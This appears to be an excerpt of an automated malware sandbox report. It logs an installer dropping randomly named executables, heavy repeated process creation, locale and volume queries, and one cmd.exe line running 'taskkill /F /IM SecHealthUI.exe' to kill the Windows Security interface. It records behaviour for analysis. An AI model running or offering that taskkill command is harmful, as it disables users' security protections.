      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM SecHealthUI.exe
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 28_2_0046F048
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 28_2_0046B007
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 28_2_0046F299
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 28_2_0046F334
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 28_2_0046F5E6
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 28_2_0046F587
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 28_2_0046F6BB
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 28_2_0046F706
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 28_2_0046F7AD
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 28_2_0046F8B3
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 28_2_0046AB0C
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 29_2_0046F048
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 29_2_0046B007
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 29_2_0046F8B3
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 29_2_0046F299
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 29_2_0046AB0C
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 29_2_0046F334
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 29_2_0046F5E6
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 29_2_0046F587
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: EnumSystemLocalesW, 29_2_0046F6BB
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW, 29_2_0046F706
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 29_2_0046F7AD
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\Desktop\New-inst-x64.exe VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exe VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local\Temp\xctyuuxnvcrcuez.exe VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local\mbtbiqwunmmmyby.exe VolumeInformation
      Source: C:\Users\user\Desktop\New-inst-x64.exe Queries volume information: C:\Users\user\AppData\Local\ztrucvcctzwerxc.exe VolumeInformation
      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
